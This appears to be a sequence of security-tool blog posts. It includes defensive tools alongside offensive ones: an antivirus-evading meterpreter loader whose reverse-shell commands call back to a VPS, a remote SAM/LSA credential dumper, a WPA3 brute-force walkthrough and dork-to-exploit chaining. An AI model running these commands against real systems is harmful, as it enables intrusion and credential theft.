PwnXSS - Vulnerability XSS Scanner Exploit

September 25, 2020, 4:30 am

≫ Next: Go-Dork - The Fastest Dork Scanner Written In Go

≪ Previous: PSMDATP - PowerShell Module For Managing Microsoft Defender Advanced Threat Protection

A powerful XSS scanner made in python 3.7

Installing

Requirements:

BeautifulSoup4

pip install bs4

requests

pip install requests

python 3.7

Commands:

git clone https://github.com/pwn0sec/PwnXSS
chmod 755 -R PwnXSS
cd PwnXSS
python3 pwnxss.py --help

Usage

Basic usage:

python3 pwnxss.py -u http://testphp.vulnweb.com

Advanced usage:

python3 pwnxss.py --help

Main features

crawling all links on a website ( crawler engine )
POST and GET forms are supported
many settings that can be customized
Advanced error handling
Multiprocessing support.
ETC....

Roadmap

v0.3B:

Added custom options ( --proxy, --user-agent etc... )

v0.3B Patch:

Added support for ( form method GET )

v0.4B:

Improved Error handling

Now Multiple parameters for GET method is Supported

v0.5 Release (Final):

Bug fixed
Now cookies is supported. (--cookie {})

Note

Sorry for my bad english
if you run pwnxss on the win10 terminal you will get an untidy output
now it doesn't support DOM

Download PwnXSS

↧

Go-Dork - The Fastest Dork Scanner Written In Go

September 25, 2020, 1:30 pm

≫ Next: Velociraptor - Endpoint Visibility and Collection Tool

≪ Previous: PwnXSS - Vulnerability XSS Scanner Exploit

The fastest dork scanner written in Go.

There are also various search engines supported by go-dork, including Google, Shodan, Bing, Duck, Yahoo and Ask.

Install

Download a prebuilt binary from releases page, unpack and run! or
If you have go compiler installed and configured:

> GO111MODULE=on go get -v github.com/dwisiswant0/go-dork/...

Usage

Basic Usage

Simply, go-dork can be run with:

> go-dork -q "inurl:'...'"

Flags

> go-dork -h

This will display help for the tool. Here are all the switches it supports.

Flag	Description
-q/--query	Search query (required)
-e/--engine	Provide search engine (default: Google)
	(options: Google, Shodan, Bing, Duck, Yahoo, Ask)
-p/--page	Specify number of pages (default: 1)
-H/--header	Pass custom header to search engine
-x/--proxy	Use proxy to surfing
-s/--silent	Silent mode, prints only results in output
-nc/--no-color	Disable colored output results

Querying

> go-dork -q "inurl:..."

Queries can also be input with stdin

> cat dorks.txt | go-dork -p 5

Defining engine

Search engine can be changed from the available engines: Google, Shodan, Bing, Duck, Yahoo, Ask. However, if the -e flag is not defined, it will use the Google search engine by default.

> go-dork -e bing -q ".php?id="

This will do a search by the Bing engine.

Pagination

By default, go-dork selects the first page, you can customize using the -p flag.

> go-dork -q "intext:'jira'" -p 5

It will search sequentially from pages 1 to 5.

Adding Headers

Maybe you want to use a search filter on the Shodan engine, you can use custom headers to add cookies or other header parts.

> go-dork -q "org:'Target' http.favicon.hash:116323821" \
  --engine shodan -H "Cookie: ..." -H "User-Agent: ..."

Using Proxy

Using a proxy, this can also be useful if Google or other engines meet Captcha.

> go-dork -q "intitle:'BigIP'" -p 2 -x http://127.0.0.1:8989

Chained with other tools

If you want to chain the go-dork results with another tool, use the -s flag.

> go-dork -q "inurl:'/secure' intext:'jira' site:org" -s | nuclei -t workflows/jira-exploitaiton-workflow.yaml

Help & Bugs

If you are still confused or found a bug, please open the issue. All bug reports are appreciated, some features have not been tested yet due to lack of free time.

TODOs

Fixes Yahoo regexes
Fixes Google regexes if using custom User-Agent
Stopping if there's no results & page flag was set
DuckDuckGo next page

Download Go-Dork

↧

Velociraptor - Endpoint Visibility and Collection Tool

September 26, 2020, 4:30 am

≫ Next: SharpSecDump - .Net Port Of The Remote SAM + LSA Secrets Dumping Functionality Of Impacket'S Secretsdump.Py

≪ Previous: Go-Dork - The Fastest Dork Scanner Written In Go

Velociraptor is a tool for collecting host based state information using Velocidex Query Language (VQL) queries.

To learn more about Velociraptor, read the documentation on:

https://www.velocidex.com/docs/

Quick start

If you want to see what Velociraptor is all about simply:

Download the binary from the release page for your favorite platform (Windows/Linux/MacOS).
Start the GUI

  $ velociraptor gui

This will bring up the GUI, Frontend and a local client. You can collect artifacts from the client (which is just running on your own machine) as normal.

Once you are ready for a full deployment, check out the various deployment options at https://www.velocidex.com/docs/getting-started

Running Velociraptor via Docker

To run a Velociraptor server via Docker, follow the instructions here: https://github.com/weslambert/velociraptor-docker

Running Velociraptor locally

Velociraptor is also useful as a local triage tool. You can create a self contained local collector using the GUI:

Start the GUI as above (velociraptor gui).
Select the Server Artifacts sidebar menu, then Build Collector.
Select and configure the artifacts you want to collect tnen select the Uploaded Files tab and download your customized collector.

Building from source

To build from source, make sure you have a recent Golang installed from https://golang.org/dl/ (Currently at least Go 1.14):

    $ git clone https://github.com/Velocidex/velociraptor.git
    $ cd velociraptor

    # This will build the GUI elements. You will need to have node
    # installed first. For example on Windows get it from
    # https://nodejs.org/en/download/ . You also need to have JAVA
    # installed from https://www.java.com because the js compiler
    # needs it.
    $ cd gui/static/
    $ npm install

    # If gulp is not on your path you need to run it using node:
    # node node_modules\gulp\bin\gulp.js compile
    $ gulp compile
    $ cd -

    # This builds a release (i.e. it will embed the GUI files in the
    # binary). If you dont care about the GUI a simple "make" will
    # build a bare debug binary.
    $ go run make.go -v release
    $ go run make.go -v windows

If you want to rebuild the protobuf you will need to install protobuf compiler (This is only necessary when editing any *.proto file):

   $ wget https://github.com/protocolbuffers/protobuf/releases/download/v3.13.0/protoc-3.13.0-linux-x86_64.zip
   $ unzip protoc-3.13.0-linux-x86_64.zip
   $ sudo mv include/google/ /usr/local/include/
   $ sudo mv bin/protoc /usr/local/bin/
   $ go get -u github.com/golang/protobuf/protoc-gen-go/
   $ go install github.com/golang/protobuf/protoc-gen-go/
   $ go get -u github.com/grpc-ecosystem/grpc-gateway/protoc-gen-grpc-gateway
   $ go install github.com/grpc-ecosystem/grpc-gateway/protoc-gen-grpc-gateway
   $ ./make_proto.sh

Getting the latest version

We have a pretty frequent release schedule but if you see a new feature submitted that you are really interested in, we would love to have more testing prior to the official release.

We have a CI pipeline managed by GitHub actions. You can see the pipeline by clicking the actions tab on our GitHub project. There are two workflows:

Windows Test: this workflow build a minimal version of the Velociraptor binary (without the GUI) and runs all the tests on it. We also test various windows support functions in this pipeline. This pipeline builds on every push in each PR.
Linux Build All Arches: This pipeline builds complete binaries for many supported architectures. It only runs when the PR is merged into the master branch.

If you fork the project on GitHub, the pipelines will run on your own fork as well as long as you enable GitHub Actions on your fork. If you need to prepare a PR for a new feature or modify an existing feature you can use this to build your own binaries for testing on all architectures before send us the PR.

Getting help

Questions and feedback are welcome at velociraptor-discuss@googlegroups.com

You can also chat with us directly on discord https://www.velocidex.com/discord

File issues on https://github.com/Velocidex/velociraptor

Read more about Velociraptor on our blog:

https://www.velocidex.com/blog/

Hang out on Medium https://medium.com/velociraptor-ir

Download Velociraptor

↧

SharpSecDump - .Net Port Of The Remote SAM + LSA Secrets Dumping Functionality Of Impacket'S Secretsdump.Py

September 26, 2020, 1:30 pm

≫ Next: Wacker - A WPA3 Dictionary Cracker

≪ Previous: Velociraptor - Endpoint Visibility and Collection Tool

.Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py. By default runs in the context of the current user. Please only use in environments you own or have permission to test against :)

Usage

SharpSecDump.exe -target=192.168.1.15 -u=admin -p=Password123 -d=test.local

Required Flags

-target - Comma seperated list of IP's / hostnames to scan. Please don't include spaces between addresses. Can also dump hashes on the local system by setting target to 127.0.0.1.

Optional Flags

-u - Username to use, if you want to use alternate credentials to run. Must use with -p and -d flags
-p - Plaintext password to use, if you want to use alternate credentials to run. Must use with -u and -d flags
-d - Domain to use, if you want to use alternate credentials to run (. for local domain). Must use with -u and -p flags
-threads - Threads to use to concurently enumerate multiple remote hosts (Default: 10)

Notes

The project has been tested against Win 7,10, Server 2012, and Server 2016. Older versions (win 2003 / xp) may not work with this tool.

By default, if you're attempting to dump hives from your local system, you'll need to be running from a high-integrity context. However, this is not necessary when targeting remote systems.

This currently supports SAM + SECURITY registry hive dumping to retrieve cached credential data. However, it does not support NTDS.dit parsing / dcsync yet. If you're looking for dcsync functionality in a .Net project I recommend sharpkatz.

If a system is configured to disallow RPC over TCP (RPC over named pipe is required -- this is not a default setting) there is a 21s delay before Windows will fall back to RPC/NP, but will still allow the connection. This appears to be a limitation of using API calls that leverage the SCManager to remotely bind to services.

Credits

This code is a port of functionality from impacket by @agsolino and pypykatz by @skelsec. All credit goes to them for the original steps to parse and decrypt info from the registry hives.

The registry hive structures used are from gray_hat_csharp_code by @BrandonPrry.

Finally, the original idea for the script was based on a partial port I was working on of Posh_SecModule by @Carlos_Perez, a good chunk of initial SAM parsing code came from that project.

Download SharpSecDump

↧

Wacker - A WPA3 Dictionary Cracker

September 27, 2020, 4:30 am

≫ Next: PwnedPasswordsChecker - Search (Offline) If Your Password (NTLM Or SHA1 Format) Has Been Leaked (HIBP Passwords List V5)

≪ Previous: SharpSecDump - .Net Port Of The Remote SAM + LSA Secrets Dumping Functionality Of Impacket'S Secretsdump.Py

A set of scripts to help perform an online dictionary attack against a WPA3 access point. Wacker leverages the wpa_supplicant control interface to control the operations of the supplicant daemon and to get status information and event notifications ultimately helping speedup connection attempts during brute force attempts.

Find a WPA3 AP to use

If you already have a WPA3 AP that works then great. In lieu of that you can setup a local environment using mac80211_hwsim (details below) or use the VMs provided by the RF Hackers Sanctuary (highly recommended). Testing was done almost exculsively using the simulated mac80211 environments. Little attention was given to a real AP... for now... so your YMWV.

Local Simulated Radios

To set up your own software simulator of 802.11 radios simply configure and load the correct mac80211_hwsim module.

# modprobe mac80211_hwsim radios=4
# iwconfig
wlan0     IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on

wlan1     IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on

wlan2     IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on

wlan3     IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on

Choose one of the new interfaces as your WPA3 access point and use the following conf file.

# cat hostapd.conf
interface=wlan0
ssid=WCTF_18
driver=nl80211
hw_mode=g
channel=1
logger_syslog=-1
logger_syslog_level=3
wpa=2
wpa_passphrase=Aeromechanics
wpa_key_mgmt=SAE
rsn_pairwise=CCMP
ieee80211w=1
group_mgmt_cipher=AES-128-CMAC

And start hostapd with

# hostapd -K -dd hostapd.conf

Split a wordlist

If you have intentions of farming out your cracking efforts across a series of nics the provided split.sh script will partition a wordlist for you.

# ./split.sh 10 cyberpunk.words 
  50916 cyberpunk.words.aaa
  50916 cyberpunk.words.aab
  50916 cyberpunk.words.aac
  50916 cyberpunk.words.aad
  50916 cyberpunk.words.aae
  50916 cyberpunk.words.aaf
  50916 cyberpunk.words.aag
  50916 cyberpunk.words.aah
  50916 cyberpunk.words.aai
  50907 cyberpunk.words.aaj
 509151 total

Building wpa_supplicant

We're providing our own wpa_supplicant in order to guarantee that certain configurations are set as well as a few mods that need to occur within the source code itself. To build simply do the following. Hopefully in the future this will become a deprecated step.

# apt-get install -y pkg-config libnl-3-dev gcc libssl-dev libnl-genl-3-dev
# cd wpa_supplicant-2.8/wpa_supplicant/
# cp defconfig_brute_force .config
# make -j4
# ls -al wpa_supplicant
-rwxr-xr-x 1 root root 13541416 May 31 16:30 wpa_supplicant

Of interest are a few new event messages that were added to the wpa supplicant control interface to help further distinguish outcomes the wacker script hooks.

/** auth success for our brute force stuff (WPA3) */
#define WPA_EVENT_BRUTE_SUCCESS "CTRL-EVENT-BRUTE-SUCCESS "
/** auth failure for our brute force stuff (WPA3) */
#define WPA_EVENT_BRUTE_FAILURE "CTRL-EVENT-BRUTE-FAILURE "

Python Requirement

The wacker.py script makes use of a few f-strings among other python3-isms. In the interest of releasing the code sooner this requirement was kept. Here are some generic install instructions for Python3.7 if needed. I know in the future this will become a deprecated step.

# apt-get install build-essential tk-dev libncurses5-dev libncursesw5-dev libreadline6-dev libdb5.3-dev libgdbm-dev libsqlite3-dev libssl-dev libbz2-dev libexpat1-dev liblzma-dev zlib1g-dev libffi-dev -y
# wget https://www.python.org/ftp/python/3.7.0/Python-3.7.0.tar.xz
# tar xf Python-3.7.0.tar.xz
# cd Python-3.7.0
# ./configure
# make -j4
# make altinstall

Running wacker

The wacker.py script is intended to perform all the heavy lifting.

# ./wacker.py --help
usage: wacker.py [-h] --wordlist WORDLIST --interface INTERFACE --bssid BSSID
                 --ssid SSID --freq FREQ [--start START_WORD] [--debug]

A WPA3 dictionary cracker. Must run as root!

optional arguments:
  -h, --help            show this help message and exit
  --wordlist WORDLIST   wordlist to use
  --interface INTERFACE
                        interface to use
  --bssid BSSID         bssid of the target
  --ssid SSID           the ssid of the WPA3 AP
  --freq FREQ           frequency of the ap
  --start START_WORD    word to start with in the wordlist
  --debug               increase logging output

With any luck... running the attack using just one instance...

# ./wacker.py --wordlist cyberpunk.words --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan2 --freq 2412
Start time: 21 Aug 2020 07:40:11
Starting wpa_supplicant...
    5795 / 509151   words (1.14%) :  79.41 words/sec : 0.020 hours lapsed :   1.76 hours to exhaust (21 Aug 2020 09:25:49)
Found the password: 'Aeromechanics'

Stop time: 21 Aug 2020 07:41:24

Running multiple instances of wacker is easy if you have the spare nics. Don't forget to parition the wordlist as well.

# ./wacker.py --wordlist cyberpunk.words.aaa --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan1 --freq 2412
# ./wacker.py --wordlist cyberpunk.words.aab --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan2 --freq 2412
# ./wacker.py --wordlist cyberpunk.words.aac --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan3 --freq 2412

Files of interest

wacker is quite verbose. Files of interest are found under /tmp/wpa_supplicant/

wlan1 : one end of the uds
wlan1_client : one end of the uds
wlan1.conf : initial wpa_supplicant conf needed
wlan1.log : supplicant output (only when using --debug option)
wlan1.pid : pid file for the wpa_supplciant instance
wlan1_wacker.log : wacker debug output

Caution

wacker doesn't handle acls put in place by the target WPA3 AP. Meaning, the current code always uses the same MAC address. If the target AP blacklists our MAC address then the script won't differentiate between a true auth failure and our blacklisted MAC being rejected. This will mean that we'll consider the true password as a failure. One way to solve.... we would have to add macchanger to the source at the expense of slowdown.

wacker will seemingly pause everything so often as the AP will issue a backoff timeout. This will cause metric display to seemingly pause and then start again. This is expected behavior.

Common Problems

You'll see this when your client driver doesn't support the correct AKM. Typically this manifests itself in the wpa_supplicant output after you try and run the wacker script. The supplicant will essentially hang waiting further instructions with the AKM issue detailed below. The needed AKM is 00-0F-AC:8 (SAE) in the cases of WPA3.

u631_3: WPA: AP group 0x10 network profile group 0x18; available group 0x10
u631_3: WPA: using GTK CCMP
u631_3: WPA: AP pairwise 0x10 network profile pairwise 0x18; available pairwise 0x10
u631_3: WPA: using PTK CCMP
u631_3: WPA: AP key_mgmt 0x400 network profile key_mgmt 0x400; available key_mgmt 0x400
u631_3: WPA: Failed to select authenticated key management type
u631_3: WPA: Failed to set WPA key management and encryption suites

TODO

Create a wrapper script to launch wacker across multiple nics. This will avoid having to instantiate wacker manually for each nic. Have the wrapper also split the wordlist and consolidate the stats.

Download Wacker

↧

PwnedPasswordsChecker - Search (Offline) If Your Password (NTLM Or SHA1 Format) Has Been Leaked (HIBP Passwords List V5)

September 27, 2020, 1:30 pm

≫ Next: Cooolis-ms - A Server That Supports The Metasploit Framework RPC

≪ Previous: Wacker - A WPA3 Dictionary Cracker

PwnedPasswordsChecker is a tool that checks if the hash of a known password (in SHA1 or NTLM format) is present in the list of I Have Been Pwned leaks and the number of occurrences.

You can download the hash-coded version for SHA1 here or the hash-coded version for NTLM here

Once the list is downloaded it is then necessary to convert it to binary by using my other tool HIBP PasswordList Slimmer

This script only works with the version sorted by hash and entry hashes must be in lowercase and preferably ordered by hashs

Usage :

./PwnedPasswordsChecker {InputHashList} {HashType} {OutputFile} {CompressedHIBPHashList}
./PwnedPasswordsChecker .\NTLM_LIST.txt NTLM .\Output.txt .\ntlm_hibp_compressed.bin

Output format : {hash}:{occurence}

Installation :

Download the compiled version for Windows or Linux from release page

If you wish to compile it yourself, you will need to have golang installed on your system and perform the following commands:

git clone https://github.com/JoshuaMart/PwnedPasswordsChecker && cd PwnedPasswordsChecker
go build main.go

Screenshots

Thanks to the use of a "compressed" format the tool has largely gained in performance, example of use between the old version and the new one with a list of 20,000 hashes (Intel Core I7 8565U) :

Improvements

Feel free to contact me on Twitter or do a PR to improve the script.

Download PwnedPasswordsChecker

↧

Cooolis-ms - A Server That Supports The Metasploit Framework RPC

September 28, 2020, 4:30 am

≫ Next: NERVE - Network Exploitation, Reconnaissance & Vulnerability Engine

≪ Previous: PwnedPasswordsChecker - Search (Offline) If Your Password (NTLM Or SHA1 Format) Has Been Leaked (HIBP Passwords List V5)

Cooolis-ms is a server that supports Metasploit Framework RPC. It is used to work for Shellcode and PE loader, bypassing the static detection of anti-virus software to a certain extent, and allows the Cooolis-ms server to perform with the Metasploit server separate.

Loader execution process:

connect to Cooolis-Server
Cooolis-Server connects to Metasploit RPC server
retrieve the payload and send it back to the loader

Core technologies:

静态恶意代码逃逸（第六课）

Advantages of the project

small volume (<600KB)
Support all Metasploit Payload
Simple parameters
Single file
Support separation

You can refer to here and write your own good projects

How to install

Choice 1 > Docker deployment (recommend)

Youtube:

$ git clone https://github.com/Rvn0xsy/Cooolis-ms.git
$ cd Cooolis-ms/Docker
$ docker-compose up -d

Default listening port:8899

Choice 2 > Source code deployment

$ git clone https://github.com/Rvn0xsy/Cooolis-ms.git
$ cd Cooolis-ms
$ pip3 install -r requirements.txt
$ python3 server.py -h

How to use

If you are deploying with Docker, please start directly from the third step.

Assuming this is my VPS: 10.20.56.41

First step, start Metasploit RPC server

Start Metasploit RPC server:

$ msfrpcd -U msf -P msf -u /api/1.0/ -a 127.0.0.1

Second step, start the Cooolis-ms server

Make it connect to RPC and listen to a port for sending payload:

$ python3 server.py -U msf -P msf -H 127.0.0.1 -p 55553 -s -v -l 8899 -S 10.20.56.41

Third step, configure Metasploit listener

msf5 > use exploit/multi/handler
msf5 > set payload windows/meterpreter/reverse_tcp
msf5 > set LHOST  10.20.56.41
msf5 > set LPORT 8876
msf5 > exploit -j

Fourth step, start the Cooolis-ms client

Cooolis-ms.exe -p windows/meterpreter/reverse_tcp -o LHOST=10.20.56.41,LPORT=8876,Format=dll -H 10.20.56.41 -P 8899

Q&A : Does it support RC4 encrypted Payload?

windows/meterpreter/reverse_tcp_rc4：

Cooolis-ms.exe -p windows/meterpreter/reverse_tcp_rc4 -o LHOST=10.20.56.41,LPORT=8876,RC4PASSWORD=rc4_password,Format=dll -H 10.20.56.41 -P 8899

windows/meterpreter_reverse_https

Cooolis-ms.exe -p windows/meterpreter_reverse_https -o LHOST=10.20.56.41,LPORT=8876,LURI=/api/,Format=dll -H 10.20.56.41 -P 8899

windows/meterpreter/bind_tcp_rc4

Cooolis-ms.exe -p windows/meterpreter/bind_tcp_rc4 -o RHOST=10.20.56.11,LPORT=8876,LURI=/api/,Format=dll -H 10.20.56.41 -P 8899

Other... self-play

Notice：

The -o parameter of Cooolis-ms.exe should correspond to the msf configuration.
Since this project relies on the open source project MemoryModule, it can only support PAYLOAD in DLL format. Need to add Format=dll after the -o parameter.

Download Cooolis-ms

↧

NERVE - Network Exploitation, Reconnaissance & Vulnerability Engine

September 28, 2020, 1:30 pm

≫ Next: Polypyus - Learns To Locate Functions In Raw Binaries By Extracting Known Functions From Similar Binaries

≪ Previous: Cooolis-ms - A Server That Supports The Metasploit Framework RPC

NERVE is a vulnerability scanner tailored to find low-hanging fruit level vulnerabilities, in specific application configurations, network services, and unpatched services.

It is not a replacement for Qualys, Nessus, or OpenVAS. It does not do authenticated scans, and operates in black-box mode only.

NERVE will do "some" CVE checks, but this is primarily coming from version fingerprinting.

Example of some of NERVE's detection capabilities:

Interesting Panels (Solr, Django, PHPMyAdmin, etc.)
Subdomain takeovers
Open Repositories
Information Disclosures
Abandoned / Default Web Pages
Misconfigurations in services (Nginx, Apache, IIS, etc.)
SSH Servers
Open Databases
Open Caches
Directory Indexing
Best Practices

Features

NERVE offers the following features:

Dashboard (With a Login interface)
REST API (Scheduling assessments, Obtaining results, etc)
Notifications
- Slack
- Email
- Webhook
Reports
- TXT
- CSV
- HTML
Customizable scans
- Configurable intrusiveness levels
- Scan depth
- Exclusions
- DNS / IP Based
- Threading
Network Topology Graphs

We put together Graphical User Interface primarily for ease of use, but we will be putting more emphasis on detections and new signatures than creating full blown user interface.

Prerequisites

NERVE will install all the prerequisites for you automatically if you choose the Server installation (CentOS 7.x and Ubuntu 18.x were tested) (by using install/setup.sh script). It also comes with a Dockerfile for your convenience.

Keep in mind, NERVE requires python 3.x and libraries such as python-nmap, requests, etc. and needs root access for the initial setup.

Installation

Deployment Recommendation

The best way to deploy it, is to run it against your infrastructure from multiple regions (e.g. multiple instances of NERVE, in multiple countries), and toggle continuous mode so that you can catch short-lived vulnerabilities in dynamic environments/cloud.

We typically recommend not to whitelist the IP addresses where NERVE will be initiating the scans from, to truly test your infrastructure from an attacker standpoint.

To make NERVE fairly lightweight, there's no use of a database other than Redis.

If you want to store your vulnerabilities long term, we recommend using the Web hook feature. At the end of each scan cycle, NERVE will dispatch a JSON payload to an endpoint of your choice, and you can then store it in a database for further analysis.

Here are the high level steps we recommend to get the most optimal results:

Deploy NERVE on 1 or more servers.
Create a script that fetches your Cloud services (such as AWS Route53 to get the DNS, AWS EC2 to get the instance IPs, AWS RDS to get the database IPs, etc.) and maybe a static list of IP addresses if you have assets in a Datacenter.
Call NERVE API (POST /api/scan/submit) and schedule a scan using the assets you gathered in step #2.
Fetch the results programmatically and act on them (SOAR, JIRA, SIEM, etc.)
Add your own logic (exclude certain alerts, add to database, etc.)

Docker

Clone the repository

git clone git@github.com:PaytmLabs/nerve.git && cd nerve

Build the Docker image

docker build -t nerve .

Create a container from the image

docker run -e username="YOUR_USER" -e password="YOUR_PASSWORD" -d -p 80:8080 nerve

In your browser, navigate to http://ip.add.re.ss:80 and login with the credentials you specified to in the previous command.

Server

Navigate to /opt

cd /opt/

Clone the repository

git clone git@github.com:PaytmLabs/nerve.git && cd nerve

Run Installer (requires root)

bash install/setup.sh

Check NERVE is running

systemctl status nerve

In your browser, navigate to http://ip.add.re.ss:8080 and use the credentials printed in your terminal.

Security

There are a few security mechanisms implemented into NERVE you need to be aware of.

Content Security Policy - A response header which controls where resource scan be loaded from.
Other Security Policies - These Response headers are enabled: Content-Type Options, X-XSS-Protection, X-Frame-Options, Referer-Policy
Brute Force Protection - A user will get locked if more than 5 incorrect login attempts are made.
Cookie Protection - Cookie security flags are used, such as SameSite, HttpOnly, etc.

If you identify a security vulnerability, please submit a bug to us on GitHub.

Usage

To learn about NERVE (GUI, API, etc.) we advise you to check out the documentation available to you via the platform. Once you deploy it, authenticate and on the left sidebar you will find a documentation link for API and GUI usage.

GUI Documentation

API Documentation

Screenshots

Login Screen

Dashboard Screen

Assessment Configuration

API Documentation

Reporting

Network Map

Vulnerability page

Log Console

HTML Report

Download Nerve

↧

Polypyus - Learns To Locate Functions In Raw Binaries By Extracting Known Functions From Similar Binaries

September 29, 2020, 4:30 am

≫ Next: Lil-Pwny - Auditing Active Directory Passwords Using Multiprocessing In Python

≪ Previous: NERVE - Network Exploitation, Reconnaissance & Vulnerability Engine

Polypyus learns to locate functions in raw binaries by extracting known functions from similar binaries. Thus, it is a firmware historian. Polypyus works without disassembling these binaries, which is an advantage for binaries that are complex to disassemble and where common tools miss functions. In addition, the binary-only approach makes it very fast and run within a few seconds. However, this approach requires the binaries to be for the same architecture and have similar compiler options.

Polypyus integrates into the workflow of existing tools like Ghidra, IDA, BinDiff, and Diaphora. For example, it can import previously annotated functions and learn from these, and also export found functions to be imported into IDA. Since Polypyus uses rather strict thresholds, it only found correct matches in our experiments. While this leads to fewer results than in existing tools, it is a good entry point for loading these matches into IDA to improve its auto analysis results and then run BinDiff on top.

What Polypyus solves

When working on raw firmware binaries, namely various Broadcom and CypressBluetooth firmware versions, we found that IDA auto analysis often identified function starts incorrectly. In IDA Pro 6.8 the auto analysis is a bit more aggressive, leading to more results but also more false positives. Overall, IDA Pro 7.2 was more pessimistic, but missed a lot of functions. This led to only a few BinDiff matches between our firmwares in IDA Pro 6.8 and no useful matches at all in IDA Pro 7.2.

Interestingly, BinDiff often failed to identify functions that, except from branches, were byte-identical. Note that Polypyus searches exactly for these byte-identical functions. We assume that BinDiff fails at these functions due to a different call graph produced by missing functions and false positives. Sometimes, these functions were already recognized by IDA, but often, IDA did either not recognize these as code or not mark them as function. Note that Diaphora has similar problems, as it exports functions identified by IDA before further processing them.

Moreover, while we found that Amnesia finds many functions, it also finds many false positives. However, many functions have a similar stack frame setup in the beginning. Thus, Polypyus has an option to learn common function starts from the annotated input binaries and apply this to other binaries to identify functions without matching their name. This optional step is only applied to the regions in which no functions were previously located, this way the common function starts method and the main function finding do not conflict.

How it works

Polypyus creates fuzzy binary matchers by comparing common functions in a collection of annotated firmware binaries.

Currently, the following annotations are supported:

A WICED Studiopatch.elf file, which is a special ELF file containing only symbol definitions.
A .symdefs file as it is produced by most ARM compilers.
A .csv file with a format documented in the examples.

These annotations contain the address, size, and name of known functions. The more commonalities the input binaries in the history collection have, the better for Polypyus performance and results. Given several slightly different functions, Polypyus creates very good matchers.

How to install it

Polypyus requires Python 3>= 3.6. We advise the use of a virtualenv for the following installation. Clone this repository and in this folder run:

pip install .

How to run it

After the installation the following commands are available:

polypyus-gui
polypyus-cli

Using Polypyus

Polypyus is available through a graphical and a command-line interface. Both, the GUI polypyus-gui and the CLI polypyus-cli, take these arguments during invocation:

  --verbose is the verbosity level. By default, it shows warnings -v shows info -vv show debug information.
  --project sets the location of the project file. This is either a file path or ":memory:".
  --help    Show help message.

The project option facilitates you to store your work for different contexts in different files and also reopen them again.

Using the GUI

The general GUI workflow goes from the left-hand side of the window to the right. First, binaries are added to the history. Then, symbol annotations to the entries in the history follow. Afterward, target binaries can be added. For the matching, hit Create matchers from history. Once the matchers are created, single targets can be selected, or all targets can be matched by selecting batch match. Finally, the findings can be exported to a .csv file.

In the following you can see a demo video where Polypyus only takes a few seconds to learn from two input binaries, annotate them, create matchers, and apply matches to a new binary.

Using the CLI

The upside to using the CLI is its ability to be automated. As of now, the output format of the CLI is subject to change. However, here is an example of calling it:

polypyus-cli --history examples/history/20819-A1.bin --annotation examples/history/20819-A1_patch.elf --history examples/history/20735B1.bin --annotation examples/history/20735B1_patch.elf --project test.sqlite
polypyus-cli --target examples/history/20739B1.bin --project test.sqlite

The first command creates test.sqlite as a new project file and imports 20819-A1.bin and 20735B1.bin with their respective patch.elf files. The second invocation reuses the same project file and matches against the binary 20739B1.bin. For each command, the number of --history and --annotation needs to match. These two commands could also be combined into one by adding the --target argument to the first command.

How does it work internally?

We will release a paper soon. Until then, you can take a look into Jan's Master thesis final presentation, which covers the issues encountered when working with conventional binary diffing approaches in ARM Thumb2 mode, and how the alternate binary-only approach works.

Recommended IDA Workflow

After some internal testing, we can recommend the following workflow when working with IDA Pro and Polypyus:

Create a fresh database. ARM v7 little endian, ARM Cortex M for the Bluetooth firmware.
Mark position 0x0 as Thumb (Alt-g, T=0x1).
Create ROM and RAM segments. ROM at 0x0 with rx, RAM at 0x200000 with rwx (at least for the Bluetooth firmware).
Create vector table offsets in ROM, at least for the reset vector, which is a 4-byte offset at 0x4 (o). On the CYW20735 firmware it points to 0x3bc+1. Go back one byte and create a function (p).
Wait for auto analysis to finish.
Import Polypyus results.
Run the Thumbs Up scripts.
Run both BinDiff and Diaphora. The latter ideally in an IDA version with decompiler. Use both, as they use different heuristics.

...now your IDA database might be somewhat useful :) Still a lot of things the disassembler fails at within ARM Thumb2 but way better than anything IDA does on its own.

Download Polypyus

↧

Lil-Pwny - Auditing Active Directory Passwords Using Multiprocessing In Python

September 29, 2020, 1:30 pm

≫ Next: mapCIDR - Small Utility Program To Perform Multiple Operations For A Given subnet/CIDR Ranges

≪ Previous: Polypyus - Learns To Locate Functions In Raw Binaries By Extracting Known Functions From Similar Binaries

A multiprocessing approach to auditing Active Directory passwords using Python.

About Lil Pwny

Lil Pwny is a Python application to perform an offline audit of NTLM hashes of users' passwords, recovered from Active Directory, against known compromised passwords from Have I Been Pwned. The usernames of any accounts matching HIBP will be returned in a .txt file

There are also additional features:

Ability to provide a list of your own passwords to check AD users against. This allows you to check user passwords against passwords relevant to your organisation that you suspect people might be using. These are NTLM hashed, and AD hashes are then compared with this as well as the HIBP hashes.
Return a list of accounts using the same passwords. Useful for finding users using the same password for their administrative and standard accounts.

More information about Lil Pwny can be found on my blog

Recommendations

This application was developed to ideally run on high resource infrastructure to make the most of Python multiprocessing. It will run on desktop level hardware, but the more cores you use, the faster the audit will run.

Installation

Install via pip

pip install lil-pwny

Usage

Lil-pwny will be installed as a global command, use as follows:

usage: lil-pwny [-h] -hibp HIBP [-a A] -ad AD_HASHES [-d] [-m] [-o OUTPUT]

optional arguments:
  -hibp, --hibp-path    The HIBP .txt file of NTLM hashes
  -a, --a               .txt file containing additional passwords to check for
  -ad, --ad-hashes      The NTLM hashes from of AD users
  -d, --find-duplicates Output a list of duplicate password users
  -m, --memory          Load HIBP hash list into memory (over 24GB RAM
                        required)
  -o, --out-path        Set output path. Uses working dir when not set

Example:

lil-pwny -hibp ~/hibp_hashes.txt -ad ~/ad_ntlm_hashes.txt -a ~/additional_passwords.txt -o ~/Desktop/Output -m -d

